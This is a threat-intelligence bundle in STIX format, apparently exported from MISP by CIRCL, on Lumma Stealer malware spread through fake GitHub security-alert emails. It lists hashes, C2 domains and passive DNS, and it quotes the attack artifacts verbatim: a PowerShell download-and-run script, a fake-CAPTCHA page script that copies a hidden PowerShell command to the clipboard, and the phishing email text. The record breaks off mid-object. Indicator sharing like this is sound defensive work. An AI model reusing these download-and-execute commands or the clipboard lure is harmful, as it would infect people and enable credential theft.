{
"type": "bundle",
"id": "bundle--eaa6f2f7-a944-47d2-a71d-cc7080c27fed",
"objects": [
{
"type": "identity",
"spec_version": "2.1",
"id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-09-19T07:30:53.000Z",
"modified": "2024-09-19T07:30:53.000Z",
"name": "CIRCL",
"identity_class": "organization"
},
{
"type": "report",
"spec_version": "2.1",
"id": "report--eaa6f2f7-a944-47d2-a71d-cc7080c27fed",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-09-19T07:30:53.000Z",
"modified": "2024-09-19T07:30:53.000Z",
"name": "Lumma Stealer Malware (delivered via GitHub Spam) - Pandora analysis (l6E.exe)",
"published": "2024-09-19T07:31:18Z",
"object_refs": [
"observed-data--d98b9983-dd3f-46e0-886f-d239c9901b8f",
"x509-certificate--d98b9983-dd3f-46e0-886f-d239c9901b8f",
"observed-data--e64b7f30-9aed-4fff-823b-72c2a22b16f8",
"x509-certificate--e64b7f30-9aed-4fff-823b-72c2a22b16f8",
"x-misp-object--c30b4f6b-e94d-4995-9e2a-ab675a47a020",
"indicator--5c92fd4e-765a-418a-bc4c-9b1bc9db3fb6",
"indicator--8ad8f83d-4f64-4a66-8849-e6b3fe938725",
"malware--7b88da77-5001-4565-926e-965d55319a24",
"observed-data--6cf75a0e-8809-4ba1-9e06-0de7f5815935",
"email-message--6cf75a0e-8809-4ba1-9e06-0de7f5815935",
"indicator--3bf7a6e8-a3b2-4975-bf4c-cc2c90329a94",
"malware--a4e7b874-225e-4206-9cf8-f858854d4ca5",
"x-misp-object--74c5c23f-d5e2-4407-b36a-94bb95135a77",
"x-misp-object--a9e61709-f87b-460b-9b43-03e65c73158e",
"x-misp-object--8d5c5d36-0492-46c2-97df-a70cfcdf04bd",
"x-misp-object--b53c8423-c8a7-4863-a01a-3e9eebcb199f",
"x-misp-object--8191b040-b2fe-4f2e-9dbd-9069d833a4e7",
"indicator--6772a782-f051-4a2a-b3e3-2a6794dcd31d",
"x-misp-object--955c7da3-97ac-4ea0-bc8d-50dee6e03306",
"x-misp-object--d8e8ebd4-0bdd-44f7-9802-14ebf7842bb1",
"x-misp-object--dd34d3e1-91f3-4dd5-95b8-b870b7a19f84",
"relationship--8fb1b0ab-8275-4d7d-bf33-fff50945409b",
"relationship--a7ad8124-928f-4630-9572-0a842e4f054f",
"relationship--11f78223-6aa5-498f-ade3-7614709517ab",
"relationship--28aaf756-8380-4651-8f67-8179d33ae7eb",
"relationship--778739ce-7d62-407e-b7d7-47738f1f20a7",
"relationship--e330e7a8-ca8d-4c09-a08d-995897dd83a5",
"relationship--2e94d260-5c02-44f7-b254-ae11af7a2fb9",
"relationship--cd29672f-ec6e-4c10-964e-15f32d57a4cd",
"relationship--ea68661a-18d8-4e1e-ad7f-072952fb7b1b",
"relationship--b21581ce-31d2-422c-b108-c7c3ee1c94c9",
"relationship--16799923-4654-457e-8d30-1d5975e69155",
"relationship--09f6a1c4-3452-443e-a223-ab9687823be4",
"relationship--0bbed3e1-5677-41b6-b35a-75adfa959e7e"
],
"labels": [
"Threat-Report",
"misp:tool=\"MISP-STIX-Converter\"",
"misp-galaxy:malpedia=\"Lumma Stealer\"",
"type:OSINT",
"osint:lifetime=\"perpetual\"",
"tlp:clear"
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--d98b9983-dd3f-46e0-886f-d239c9901b8f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-09-19T06:17:26.000Z",
"modified": "2024-09-19T06:17:26.000Z",
"first_observed": "2024-09-19T06:17:26Z",
"last_observed": "2024-09-19T06:17:26Z",
"number_observed": 1,
"object_refs": [
"x509-certificate--d98b9983-dd3f-46e0-886f-d239c9901b8f"
],
"labels": [
"misp:name=\"x509\"",
"misp:meta-category=\"network\"",
"misp:to_ids=\"False\""
]
},
{
"type": "x509-certificate",
"spec_version": "2.1",
"id": "x509-certificate--d98b9983-dd3f-46e0-886f-d239c9901b8f",
"version": "3",
"signature_algorithm": "1.2.840.113549.1.1.12",
"issuer": "C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert Trusted Root G4",
"validity_not_before": "2021-04-29T00:00:00Z",
"validity_not_after": "2036-04-28T23:59:59Z",
"subject": "C=US, O=DigiCert\\, Inc., CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1",
"x_misp_raw_base64": "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"
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--e64b7f30-9aed-4fff-823b-72c2a22b16f8",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-09-19T06:17:26.000Z",
"modified": "2024-09-19T06:17:26.000Z",
"first_observed": "2024-09-19T06:17:26Z",
"last_observed": "2024-09-19T06:17:26Z",
"number_observed": 1,
"object_refs": [
"x509-certificate--e64b7f30-9aed-4fff-823b-72c2a22b16f8"
],
"labels": [
"misp:name=\"x509\"",
"misp:meta-category=\"network\"",
"misp:to_ids=\"False\""
]
},
{
"type": "x509-certificate",
"spec_version": "2.1",
"id": "x509-certificate--e64b7f30-9aed-4fff-823b-72c2a22b16f8",
"version": "3",
"signature_algorithm": "1.2.840.113549.1.1.11",
"issuer": "C=US, O=DigiCert\\, Inc., CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1",
"validity_not_before": "2022-09-22T00:00:00Z",
"validity_not_after": "2023-10-19T23:59:59Z",
"subject": "??=SE, ??=Private Organization, serialNumber=5567037485, C=SE, L=Stockholm, O=Spotify AB, CN=Spotify AB",
"x_misp_raw_base64": "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"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--c30b4f6b-e94d-4995-9e2a-ab675a47a020",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-09-19T06:17:26.000Z",
"modified": "2024-09-19T06:17:26.000Z",
"labels": [
"misp:name=\"authenticode-signerinfo\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "issuer",
"value": "C=US, O=DigiCert\\, Inc., CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1",
"category": "Other",
"uuid": "f90f1d07-fe98-4bbb-8436-730415190e8b"
},
{
"type": "text",
"object_relation": "version",
"value": "1",
"category": "Other",
"uuid": "00da5189-e1ae-4642-901c-cf7320e7bde8"
},
{
"type": "text",
"object_relation": "digest_algorithm",
"value": "lief._lief.PE.ALGORITHMS.SHA_256",
"category": "Other",
"uuid": "38c06d22-7fb9-48cc-af3a-13745e979bb8"
},
{
"type": "text",
"object_relation": "encryption_algorithm",
"value": "lief._lief.PE.ALGORITHMS.RSA",
"category": "Other",
"uuid": "45c36dff-e7df-46da-aaa4-1ed160399d3c"
},
{
"type": "text",
"object_relation": "digest-base64",
"value": "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",
"category": "Other",
"uuid": "6f842da7-09df-499a-9454-865b71b343d5"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "authenticode-signerinfo"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5c92fd4e-765a-418a-bc4c-9b1bc9db3fb6",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-09-19T07:28:43.000Z",
"modified": "2024-09-19T07:28:43.000Z",
"pattern": "[file:hashes.MD5 = 'fac2188e4a28a0cf32bf4417d797b0f8' AND file:hashes.SHA1 = '1970de8788c07b548bf04d0062a1d4008196a709' AND file:hashes.SHA256 = 'd737637ee5f121d11a6f3295bf0d51b06218812b5ec04fe9ea484921e905a207' AND file:hashes.SHA512 = '58086100d653ceeae44e0c99ec8348dd2beaf198240f37691766bee813953f8514c485e39f5552ee0d18c61f02bff10c0c427f3fec931bc891807be188164b2b' AND file:hashes.SSDEEP = '6144:HDd+O7VyIqZiQUa+I0st4nlSVbiWN6VqWeqfn3Zsz9HMiobZYK1QE:B+O5yIqxwI3tFOqWeqcYbZYzE' AND file:name = 'l6E.exe' AND file:size = '354168' AND (file:content_ref.payload_bin = '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
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-09-19T07:28:43Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--8ad8f83d-4f64-4a66-8849-e6b3fe938725",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-09-19T06:20:38.000Z",
"modified": "2024-09-19T06:20:38.000Z",
"pattern": "[(network-traffic:dst_ref.type = 'domain-name' AND network-traffic:dst_ref.value = 'tryyudjasudqo.shop') AND (network-traffic:dst_ref.type = 'domain-name' AND network-traffic:dst_ref.value = 'eemmbryequo.shop') AND (network-traffic:dst_ref.type = 'domain-name' AND network-traffic:dst_ref.value = 'reggwardssdqw.shop') AND (network-traffic:dst_ref.type = 'domain-name' AND network-traffic:dst_ref.value = 'relaxatinownio.shop') AND (network-traffic:dst_ref.type = 'domain-name' AND network-traffic:dst_ref.value = 'tesecuuweqo.shop') AND (network-traffic:dst_ref.type = 'domain-name' AND network-traffic:dst_ref.value = 'tendencctywop.shop') AND (network-traffic:dst_ref.type = 'domain-name' AND network-traffic:dst_ref.value = 'licenseodqwmqn.shop') AND (network-traffic:dst_ref.type = 'domain-name' AND network-traffic:dst_ref.value = 'keennylrwmqlw.shop')]",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-09-19T06:20:38Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "network"
}
],
"labels": [
"misp:name=\"ip-port\"",
"misp:meta-category=\"network\"",
"misp:to_ids=\"True\""
]
},
{
"type": "malware",
"spec_version": "2.1",
"id": "malware--7b88da77-5001-4565-926e-965d55319a24",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-09-19T07:27:14.000Z",
"modified": "2024-09-19T07:27:14.000Z",
"is_family": false,
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "misc"
}
],
"implementation_languages": [
"PowerShell"
],
"labels": [
"misp:name=\"script\"",
"misp:meta-category=\"misc\"",
"misp:to_ids=\"False\""
],
"x_misp_script": "$webClient = New-Object System.Net.WebClient\r\n $url1 = \"https://github-scanner.com/l6E.exe\"\r\n $filePath1 = \"$env:TEMP\\SysSetup.exe\"\r\n $webClient.DownloadFile($url1, $filePath1)\r\n Start-Process -FilePath $env:TEMP\\SysSetup.exe",
"x_misp_state": "Malicious"
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--6cf75a0e-8809-4ba1-9e06-0de7f5815935",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-09-19T06:27:57.000Z",
"modified": "2024-09-19T06:27:57.000Z",
"first_observed": "2024-09-19T06:27:57Z",
"last_observed": "2024-09-19T06:27:57Z",
"number_observed": 1,
"object_refs": [
"email-message--6cf75a0e-8809-4ba1-9e06-0de7f5815935"
],
"labels": [
"misp:name=\"email\"",
"misp:meta-category=\"network\"",
"misp:to_ids=\"False\""
]
},
{
"type": "email-message",
"spec_version": "2.1",
"id": "email-message--6cf75a0e-8809-4ba1-9e06-0de7f5815935",
"is_multipart": false,
"x_misp_email_body": "Hey there!\r\n\r\nWe have detected a security vulnerability in your repository. Please contact us at https://github-scanner.com to get more information on how to fix this issue.\r\n\r\nBest regards,\r\nGithub Security Team"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--3bf7a6e8-a3b2-4975-bf4c-cc2c90329a94",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-09-19T06:43:52.000Z",
"modified": "2024-09-19T06:43:52.000Z",
"description": "Enriched via the url_import module",
"pattern": "[url:value = 'https://github-scanner.com' AND url:x_misp_tld = 'com' AND url:x_misp_host = 'github-scanner.com' AND url:x_misp_domain_without_tld = 'github-scanner' AND url:x_misp_domain = 'github-scanner.com']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-09-19T06:43:52Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "network"
}
],
"labels": [
"misp:name=\"url\"",
"misp:meta-category=\"network\"",
"misp:to_ids=\"True\""
]
},
{
"type": "malware",
"spec_version": "2.1",
"id": "malware--a4e7b874-225e-4206-9cf8-f858854d4ca5",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-09-19T06:25:55.000Z",
"modified": "2024-09-19T06:25:55.000Z",
"is_family": false,
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "misc"
}
],
"implementation_languages": [
"JavaScript"
],
"labels": [
"misp:name=\"script\"",
"misp:meta-category=\"misc\"",
"misp:to_ids=\"False\""
],
"x_misp_script": "<script>\r\n\r\n const verifyButton = document.getElementById('verifyButton');\r\n const modalBg = document.getElementById('modalBg');\r\n\r\n\r\n verifyButton.addEventListener('click', function() {\r\n modalBg.style.display = 'flex'; \r\n const captchaText = \"powershell.exe -w hidden -Command \\\"iex (iwr 'https://github-scanner.com/download.txt').Content\\\" # \\\"\u2705 ''I am not a robot - reCAPTCHA Verification ID: 93752\\\"\";\r\n const tmpTxtArea = document.createElement(\"textarea\");\r\n tmpTxtArea.value = captchaText;\r\n document.body.appendChild(tmpTxtArea);\r\n tmpTxtArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tmpTxtArea);\r\n\r\n\r\n });\r\n\r\n </script>",
"x_misp_state": "Malicious"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--74c5c23f-d5e2-4407-b36a-94bb95135a77",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-09-19T06:42:41.000Z",
"modified": "2024-09-19T06:42:41.000Z",
"labels": [
"misp:name=\"passive-dns\"",
"misp:meta-category=\"network\""
],
"x_misp_attributes": [
{
"type": "counter",
"object_relation": "count",
"value": "1",
"category": "Other",
"uuid": "a7146192-8420-4928-80cd-b7dd54b2d63a"
},
{
"type": "text",
"object_relation": "origin",
"value": "https://www.circl.lu/pdns/",
"category": "Other",
"uuid": "d0ea57d4-b2df-4520-a130-592898e9143a"
},
{
"type": "datetime",
"object_relation": "time_first",
"value": "2024-09-18T15:43:13+00:00",
"category": "Other",
"uuid": "f5765243-a368-4412-93fe-fd5fc6b8bc4c"
},
{
"type": "text",
"object_relation": "rrtype",
"value": "A",
"category": "Other",
"uuid": "7a458de1-9ea2-46bc-a784-f2853ac3f82a"
},
{
"type": "text",
"object_relation": "rrname",
"value": "188.114.96.3",
"category": "Other",
"uuid": "3f31fe30-22a8-4ec6-a58a-ba597d266087"
},
{
"type": "text",
"object_relation": "rdata",
"value": "github-scanner.com",
"category": "Other",
"uuid": "5e1f1f5f-e66e-4870-aad9-b483506fb6bb"
},
{
"type": "datetime",
"object_relation": "time_last",
"value": "2024-09-18T15:43:13+00:00",
"category": "Other",
"uuid": "f24dc9c9-717f-423a-b6da-32542a4523fd"
}
],
"x_misp_comment": "github-scanner.com: Enriched via the circl_passivedns module",
"x_misp_meta_category": "network",
"x_misp_name": "passive-dns"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--a9e61709-f87b-460b-9b43-03e65c73158e",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-09-19T07:27:51.000Z",
"modified": "2024-09-19T07:27:51.000Z",
"labels": [
"misp:name=\"passive-dns\"",
"misp:meta-category=\"network\""
],
"x_misp_attributes": [
{
"type": "counter",
"object_relation": "count",
"value": "1",
"category": "Other",
"uuid": "12c7a456-b9d4-462a-a5c8-51b4e97c56f1"
},
{
"type": "text",
"object_relation": "origin",
"value": "https://www.circl.lu/pdns/",
"category": "Other",
"uuid": "4d6ba8b3-d4aa-419e-bdfe-8e3f81d7a13a"
},
{
"type": "datetime",
"object_relation": "time_first",
"value": "2024-09-18T15:43:13+00:00",
"category": "Other",
"uuid": "0581172c-fed8-4e53-88b8-b353eb7f0fe6"
},
{
"type": "text",
"object_relation": "rrtype",
"value": "A",
"category": "Other",
"uuid": "98a3b004-8bf4-4ba6-a6ea-36d1db8b35ba"
},
{
"type": "text",
"object_relation": "rrname",
"value": "188.114.97.3",
"category": "Other",
"uuid": "2651f7af-b03f-4662-a834-50026d0f5fc3"
},
{
"type": "text",
"object_relation": "rdata",
"value": "github-scanner.com",
"category": "Other",
"uuid": "158e2135-3f8d-414b-98af-146c79c19cf1"
},
{
"type": "datetime",
"object_relation": "time_last",
"value": "2024-09-18T15:43:13+00:00",
"category": "Other",
"uuid": "1834cdf2-5ec0-49a3-9614-f346c40b2a7d"
}
],
"x_misp_comment": "github-scanner.com: Enriched via the circl_passivedns module",
"x_misp_meta_category": "network",
"x_misp_name": "passive-dns"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--8d5c5d36-0492-46c2-97df-a70cfcdf04bd",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-09-19T07:27:30.000Z",
"modified": "2024-09-19T07:27:30.000Z",
"labels": [
"misp:name=\"passive-dns\"",
"misp:meta-category=\"network\""
],
"x_misp_attributes": [
{
"type": "counter",
"object_relation": "count",
"value": "3",
"category": "Other",
"uuid": "f1656c54-eb92-4b33-a008-e24b6b51bf7e"
},
{
"type": "text",
"object_relation": "origin",
"value": "https://www.circl.lu/pdns/",
"category": "Other",
"uuid": "e6681e64-9d1b-4bd9-be23-80e1fb8584d8"
},
{
"type": "datetime",
"object_relation": "time_first",
"value": "2024-09-18T20:46:29+00:00",
"category": "Other",
"uuid": "b5539651-1ce5-469d-86e5-0c03758544c3"
},
{
"type": "text",
"object_relation": "rrtype",
"value": "SOA",
"category": "Other",
"uuid": "726c8c6d-947a-421b-8771-4996e61b9be6"
},
{
"type": "text",
"object_relation": "rrname",
"value": "cody.ns.cloudflare.com dns.cloudflare.com 2352168100 10000 2400 604800 1800",
"category": "Other",
"uuid": "74f3d184-1838-48bc-bff1-4bcfb3eecf8f"
},
{
"type": "text",
"object_relation": "rdata",
"value": "github-scanner.com",
"category": "Other",
"uuid": "17d1b83b-2b50-4ffd-914f-fd436b5817c8"
},
{
"type": "datetime",
"object_relation": "time_last",
"value": "2024-09-19T00:21:56+00:00",
"category": "Other",
"uuid": "0bc5f99a-63dc-419c-9afc-ef0270269239"
}
],
"x_misp_comment": "github-scanner.com: Enriched via the circl_passivedns module",
"x_misp_meta_category": "network",
"x_misp_name": "passive-dns"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--b53c8423-c8a7-4863-a01a-3e9eebcb199f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-09-19T06:27:12.000Z",
"modified": "2024-09-19T06:27:12.000Z",
"labels": [
"misp:name=\"passive-dns\"",
"misp:meta-category=\"network\""
],
"x_misp_attributes": [
{
"type": "counter",
"object_relation": "count",
"value": "6",
"category": "Other",
"uuid": "2d1bf529-44f6-4bd4-ac89-97f6bbffb7dd"
},
{
"type": "text",
"object_relation": "origin",
"value": "https://www.circl.lu/pdns/",
"category": "Other",
"uuid": "dfb4bc4e-177b-4346-b8c4-16489de1f367"
},
{
"type": "datetime",
"object_relation": "time_first",
"value": "2024-09-18T20:29:31+00:00",
"category": "Other",
"uuid": "30c74f8c-0b9c-418f-8292-4ec681c94451"
},
{
"type": "text",
"object_relation": "rrtype",
"value": "A",
"category": "Other",
"uuid": "a60bbba2-1d7b-4bbb-a4a1-075a75d5fe9e"
},
{
"type": "text",
"object_relation": "rrname",
"value": "185.208.159.43",
"category": "Other",
"uuid": "f7484977-e5cf-4cce-8a1d-aeb7d1de1813"
},
{
"type": "text",
"object_relation": "rdata",
"value": "github-scanner.com",
"category": "Other",
"uuid": "4b02653a-19de-44d8-87ac-3a6c51cea125"
},
{
"type": "datetime",
"object_relation": "time_last",
"value": "2024-09-19T05:00:55+00:00",
"category": "Other",
"uuid": "7e65468d-c230-4c73-9bcb-498531b6ca8a"
}
],
"x_misp_comment": "github-scanner.com: Enriched via the circl_passivedns module",
"x_misp_meta_category": "network",
"x_misp_name": "passive-dns"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--8191b040-b2fe-4f2e-9dbd-9069d833a4e7",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-09-19T07:26:47.000Z",
"modified": "2024-09-19T07:26:47.000Z",
"labels": [
"misp:name=\"user-action\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "action",
"value": "Execute",
"category": "Other",
"uuid": "5365bd91-b848-4155-8e0d-10d1f2c20bd6"
},
{
"type": "text",
"object_relation": "description",
"value": "Copy the paste buffer and execute the following script.",
"category": "Other",
"uuid": "c191cff1-85f2-4469-ac94-e0901a794c3b"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "user-action"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--6772a782-f051-4a2a-b3e3-2a6794dcd31d",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-09-19T06:40:10.000Z",
"modified": "2024-09-19T06:40:10.000Z",
"pattern": "[file:extensions.'windows-pebinary-ext'.imphash = 'f34d5f2d4577ed6d9ceec516c1f5a744' AND file:extensions.'windows-pebinary-ext'.number_of_sections = '3' AND file:extensions.'windows-pebinary-ext'.pe_type = 'exe' AND file:extensions.'windows-pebinary-ext'.optional_header.address_of_entry_point = '4543198' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2024-09-18T14:21:22+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = '07b89ccdef9eb2727f8eae56769c60b0a84b8de906ea9ac71cdc53f7fc9608fd' AND file:extensions.'windows-pebinary-ext'.x_misp_original_filename = 'VQP.exe' AND file:extensions.'windows-pebinary-ext'.x_misp_internal_filename = 'VQP.exe' AND file:extensions.'windows-pebinary-ext'.x_misp_file_description = 'outfawned' AND file:extensions.'windows-pebinary-ext'.x_misp_file_version = '1.0.0.0' AND file:extensions.'windows-pebinary-ext'.x_misp_product_name = 'Shopman Stairs' AND file:extensions.'windows-pebinary-ext'.x_misp_product_version = '1.0.0.0' AND file:extensions.'windows-pebinary-ext'.x_misp_company_name = 'listening triskelion' AND file:extensions.'windows-pebinary-ext'.x_misp_legal_copyright = 'Copyright 2024' AND file:extensions.'windows-pebinary-ext'.x_misp_lang_id = '000004b0']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-09-19T06:40:10Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"pe\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--955c7da3-97ac-4ea0-bc8d-50dee6e03306",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-09-19T06:17:26.000Z",
"modified": "2024-09-19T06:17:26.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".text",
"category": "Other",
"uuid": "b4909947-07c4-4896-aaa3-c723e4da85bd"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
"value": "340992",
"category": "Other",
"uuid": "edc458e8-d973-4fd8-92d8-6311c4d57f9f"
},
{
"type": "float",
"object_relation": "entropy",
"value": "7.9962764836933",
"category": "Other",
"uuid": "33c823cc-ac6f-4e09-b550-676bf9217b11"
},
{
"type": "md5",
"object_relation": "md5",
"value": "14ca9e349f994e878e57686119f004d4",
"category": "Payload delivery",
"to_ids": true,
"uuid": "0b956e68-c3b9-4c7f-8b41-86574b936f62"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "9fca5f5394c9dfe0c1e13f05b4ef26c02d4f7862",
"category": "Payload delivery",
"to_ids": true,
"uuid": "732b6f90-810e-4330-8009-4f861ac91d7e"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "ff87b44ae63fc48174dd73a0efb161df297861d1e4b9c66eb1869eb0b355d7db",
"category": "Payload delivery",
"to_ids": true,
"uuid": "518870f6-9302-43ec-846d-9dd72d6bd21d"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "f9768fddc997d4f9eea1b982e4bc1b5c42edd9bcf7aa7031fba976f65d663211505b40a0a5d2b943998396fb4ee406b14867754edf74c18e922679bb809ab5a0",
"category": "Payload delivery",
"to_ids": true,
"uuid": "0073e7c4-ab21-43a4-b6e0-a6a35dac0dcb"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "6144:/Dd+O7VyIqZiQUa+I0st4nlSVbiWN6VqWeqfn3Zsz9HMiobZYK1QL:Z+O5yIqxwI3tFOqWeqcYbZYzL",
"category": "Payload delivery",
"to_ids": true,
"uuid": "3e6b9523-17a0-406b-813a-1aad3eabfacc"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--d8e8ebd4-0bdd-44f7-9802-14ebf7842bb1",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-09-19T06:17:26.000Z",
"modified": "2024-09-19T06:17:26.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".rsrc",
"category": "Other",
"uuid": "77b42955-59c7-4099-92f9-860026e5d139"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
"value": "1536",
"category": "Other",
"uuid": "8a1c3d0f-ff2b-4d0e-9dd1-7c5a3f87c552"
},
{
"type": "float",
"object_relation": "entropy",
"value": "4.224078572507",
"category": "Other",
"uuid": "ea5d4cca-6725-43c1-853f-4b38e373b925"
},
{
"type": "md5",
"object_relation": "md5",
"value": "c38218fae44dcc2ce3d1629fec6039ed",
"category": "Payload delivery",
"to_ids": true,
"uuid": "55a8331b-fb85-4d4d-a2ed-f309bfdfc276"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "59ce2a22d5441931757c56512e053728c1113694",
"category": "Payload delivery",
"to_ids": true,
"uuid": "395f491e-7183-4c16-8bbe-699f42b8a533"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "30333eda5ecb5656ee2cbd56528cf9f16c55befa0e4a0d3d08d15b69a3097b97",
"category": "Payload delivery",
"to_ids": true,
"uuid": "fd38d729-9878-43ac-bbc1-d21c37cf224d"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "5503f5311d379b243ec5177996e9d8d0b0cd14e12383cf44f93f4be83a1b0109828683e80eee2dc7131948e1f6d1708165ffe91771d4354649c03c0d004bad17",
"category": "Payload delivery",
"to_ids": true,
"uuid": "b7e2a1f8-ab37-4b5c-a8c3-b50889b60b08"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "24:7DRIYKyV6CyZhNPs2E31MPN8qgdt4+lEbNFjMyi0r:H1JoplP76KFWSfbNtm+",
"category": "Payload delivery",
"uuid": "be033b1f-c601-46b5-93ec-261dac6d59c0"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--dd34d3e1-91f3-4dd5-95b8-b870b7a19f84",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-09-19T06:17:26.000Z",
"modified": "2024-09-19T06:17:26.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".reloc",
"category": "Other",
"uuid": "3e4fd42f-994d-475d-aca9-0d815e2c9c50"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
"value": "512",
"category": "Other",
"uuid": "b81e0aaa-3423-4785-91fc-75fa8374928c"
},
{
"type": "float",
"object_relation": "entropy",
"value": "1.9473387961876",
"category": "Other",
"uuid": "6d710c11-e24c-4242-8fc8-59c9dc1ead18"
},
{
"type": "md5",
"object_relation": "md5",
"value": "b1c19dc88419b41741030f2fceb517c1",
"category": "Payload delivery",
"to_ids": true,
"uuid": "e424a76c-3282-4f7c-b863-1f280ad74df7"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "ce204d1894753f6a806fda9121c0e3ea83c23dd5",
"category": "Payload delivery",
"to_ids": true,
"uuid": "64b0d5d4-960e-4339-a1b7-7402e7e922a4"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "9a6833fd3cc183b906caf84dad1e9ce58b805f604b34fa49c73395c2a27c2a2a",
"category": "Payload delivery",
"to_ids": true,
"uuid": "e0756a69-cdba-4dc9-8069-f0b041214104"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "84ddff913d039c49bc4de7b69f43552949d05090a44b31cbb65a6474edea9eebaedb10962f1fa38e36b22f1f890787e6192eb7752d6708d11de87a14c0d93bbf",
"category": "Payload delivery",
"to_ids": true,
"uuid": "646cfa34-a007-4571-998c-8886fd6190b1"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "3:oRlF1l:oD1",
"category": "Payload delivery",
"to_ids": true,
